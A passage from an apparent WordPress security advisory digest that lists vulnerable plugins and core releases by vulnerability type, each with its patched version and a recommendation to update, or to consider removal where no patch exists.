Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: 10WebSocial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.29
Recommended Action: Update to version 1.4.29, or a newer patched version

Plugin: Google Photos Gallery with Shortcodes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Missing Authorization
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Cross-Site Request Forgery via update_project
Patched Version: 12.4.1
Recommended Action: Update to version 12.4.1, or a newer patched version

Plugin: Realty Workstation

Vulnerability: Authenticated SQL Injection
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: shortcode-ninja

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Abstracts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Soundslides

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via media-playlists
Patched Version: 3.7.5 (3.7 branch only; each later release branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Product Vendors

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Phone Orders for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.10
Recommended Action: Update to version 2.2.10, or a newer patched version

Plugin: Push Notifications for WordPress (Lite)

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Advanced Text Widget

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Link Whisper Free

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 0.6.6
Recommended Action: Update to version 0.6.6, or a newer patched version

Plugin: Category Order and Taxonomy Terms Order

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: Toolpage

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Status Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: FreeMind WP Browser

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media Library Assistant

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Recipes Writer

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TablePress – Tables in WordPress made easy

Vulnerability: XML External Entity Injection
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Jigoshop Swipe plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Freshmail for WordPress

Vulnerability: Multiple SQL Injections
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.6.13
Recommended Action: Update to version 4.6.13, or a newer patched version

Plugin: Page/Post Content Shortcode

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Category Post List Widget

Vulnerability: Cross-Site Request Forgery via gen_set_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Quotation

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Payment forms, Buy now buttons, and Invoicing System | GetPaid

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: GD bbPress Attachments

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Authentication Bypass
Patched Version: 1.1.60
Recommended Action: Update to version 1.1.60, or a newer patched version

Plugin: Form Lightbox

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Arbitrary Settings Change
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Gallery for Social Photo

Vulnerability: Cross-Site Request Forgery to Post Duplication
Patched Version: 1.0.0.29
Recommended Action: Update to version 1.0.0.29, or a newer patched version

Plugin: Job Manager & Career – Manage job board listings, and recruitments

Vulnerability: Sensitive Information Exposure
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: content_timeline

Vulnerability: SQL Injection
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass to Remove Category Attribute
Patched Version: 3.7.15 (earliest patched branch; each maintained branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Simple Org Chart

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customize WordPress Emails and Alerts – Better Notifications for WP

Vulnerability: Email Address Disclosure
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 4.0.11
Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.15.20
Recommended Action: Update to version 1.15.20, or a newer patched version

Plugin: Contact Form DB

Vulnerability: CSV Injection
Patched Version: 2.10.36
Recommended Action: Update to version 2.10.36, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Power Zoomer

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unite Gallery Lite

Vulnerability: Cross-Site Request Forgery and SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.7.10 (earliest patched branch; each maintained branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: MyBB Cross-Poster

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Designation Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accessibility Suite by Ability, Inc

Vulnerability: SQL Injection
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Domain Check

Vulnerability: Reflected Cross-Site Scripting via domain
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Simple File List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.12
Recommended Action: Update to version 4.4.12, or a newer patched version

Plugin: BNE Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Client Dash

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Paginate

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization via manual review reminders
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: Per page add to head

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GMAce

Vulnerability: Cross-Site Request Forgery via gmace_manager_client
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Download from files

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Simple User Listing

Vulnerability: Reflected Cross-Site Scripting via as
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Embed Images in Comments

Vulnerability: Cross-Site Scripting
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: asMember

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wise Chat

Vulnerability: CSV Injection
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: WP Symposium Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 16.01
Recommended Action: Update to version 16.01, or a newer patched version

Plugin: Colibri Page Builder

Vulnerability: Authenticated (Administrator+) SQL Injection via post_id
Patched Version: 1.0.229
Recommended Action: Update to version 1.0.229, or a newer patched version

Plugin: WordPress Job Board and Recruitment Plugin – JobWP

Vulnerability: Sensitive Information Exposure
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Backup by 10Web – Backup and Restore Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Login Log

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Templately – Elementor & Gutenberg Template Library: 5000+ Free & Pro Ready Templates & Cloud!

Vulnerability: Improper Authorization to Arbitrary Post Deletion
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Remote Code Execution
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Nonce Leak to Authorization Bypass
Patched Version: 1.9.51
Recommended Action: Update to version 1.9.51, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Arbitrary Media Deletion
Patched Version: 8.0.9
Recommended Action: Update to version 8.0.9, or a newer patched version

Plugin: Post Duplicator

Vulnerability: Cross-Site Scripting
Patched Version: 2.24
Recommended Action: Update to version 2.24, or a newer patched version

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.48
Recommended Action: Update to version 1.1.48, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: front-end-upload

Vulnerability: Arbitrary File Upload
Patched Version: 0.5.4
Recommended Action: Update to version 0.5.4, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated File Download with Information Disclosure
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: EAN Barcode Generator for WooCommerce: UPC, ISBN & GTIN Inventory

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: acobot

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Sola Support Tickets

Vulnerability: Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: CodeColorer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.10.1
Recommended Action: Update to version 0.10.1, or a newer patched version

Plugin: MailUp newsletter sign-up form

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Members List Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Cross-Site Scripting
Patched Version: 2.70
Recommended Action: Update to version 2.70, or a newer patched version

Plugin: OpenBook Book Data

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Query Wrangler

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 1.5.52
Recommended Action: Update to version 1.5.52, or a newer patched version

Plugin: Protected Posts Logout Button

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: WP GPX Maps

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.23
Recommended Action: Update to version 1.1.23, or a newer patched version

Plugin: PeproDev CF7 Database

Vulnerability: Unauthenticated Stored Cross-Site Scripting via form submission
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.5.19.728
Recommended Action: Update to version 7.5.19.728, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Contact Form 7 Style

Vulnerability: Not specified in the source advisory
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iframe

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: WP Print Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Author Avatars List/Block

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: Plug your WooCommerce into the largest catalog of customized print products from Helloprint

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10 (earliest patched branch; each maintained branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.10, 2.1.3

Plugin: ZeroBounce Email Verification & Validation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: CITS Support svg, webp Media and TTF,OTF File Upload

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: PhotoXhibit

Vulnerability: Reflected Cross-Site Scripting via gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Verification – Email Verification, Email OTP, Block Spam Email, Passwordless login

Vulnerability: Privilege Escalation
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Catch Themes Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: uTubeVideo Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery leading to Settings Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: FGallery Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Audit

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Custom Registration Forms Builder for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Cross-Site Request Forgery
Patched Version: 12.4.5
Recommended Action: Update to version 12.4.5, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WP Sticky Button – Click to Chat

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Post Pay Counter

Vulnerability: PHP Object Injection
Patched Version: 2.731
Recommended Action: Update to version 2.731, or a newer patched version

Plugin: Themify Post Type Builder (PTB) Search Addon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_cache_flush
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Affiliate For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2023
Recommended Action: Update to version 2023, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Insights from Google PageSpeed

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: WxSync-标准云微信公众号文章免费采集-任意公众号自动采集付费购买 (WxSync – Biaozhun Cloud WeChat Official Account article collector: free collection, automatic collection from any official account, paid purchase)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quizlord

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Extensive VC Addons for WPBakery page builder

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Weaver Show Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Display Name
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Not specified in the source advisory (affects User Profile & User Registration Forms versions up to and including 3.6.1)
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Directory Traversal to Arbitrary File Deletion and Denial of Service
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Missing Authorization
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: salesking

Vulnerability: Missing Authorization to Settings Change
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization to Arbitrary Attachment Read
Patched Version: 3.16.5
Recommended Action: Update to version 3.16.5, or a newer patched version

Plugin: Login as User or Customer

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.14.1
Recommended Action: Update to version 8.14.1, or a newer patched version

Plugin: WP Prayer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: AffiliateWP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9.1
Recommended Action: Update to version 2.0.9.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: amerisale-re

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Juicer.io: Effortlessly embed, curate, and aggregate social media feeds into your website

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Email Users

Vulnerability: Arbitrary Settings Update via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via dnf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: ConvertBox Auto Embed WordPress plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: CommentLuv

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.92.4
Recommended Action: Update to version 2.92.4, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Cross-Site Request Forgery in dnd_upload_cf7_upload and dnd_codedropz_upload_delete
Patched Version: 1.3.6.6
Recommended Action: Update to version 1.3.6.6, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.11.5
Recommended Action: Update to version 6.11.5, or a newer patched version

Plugin: Login No Captcha reCAPTCHA

Vulnerability: CAPTCHA Bypass via Whitelisted IP Address Spoofing
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Page Link Manager

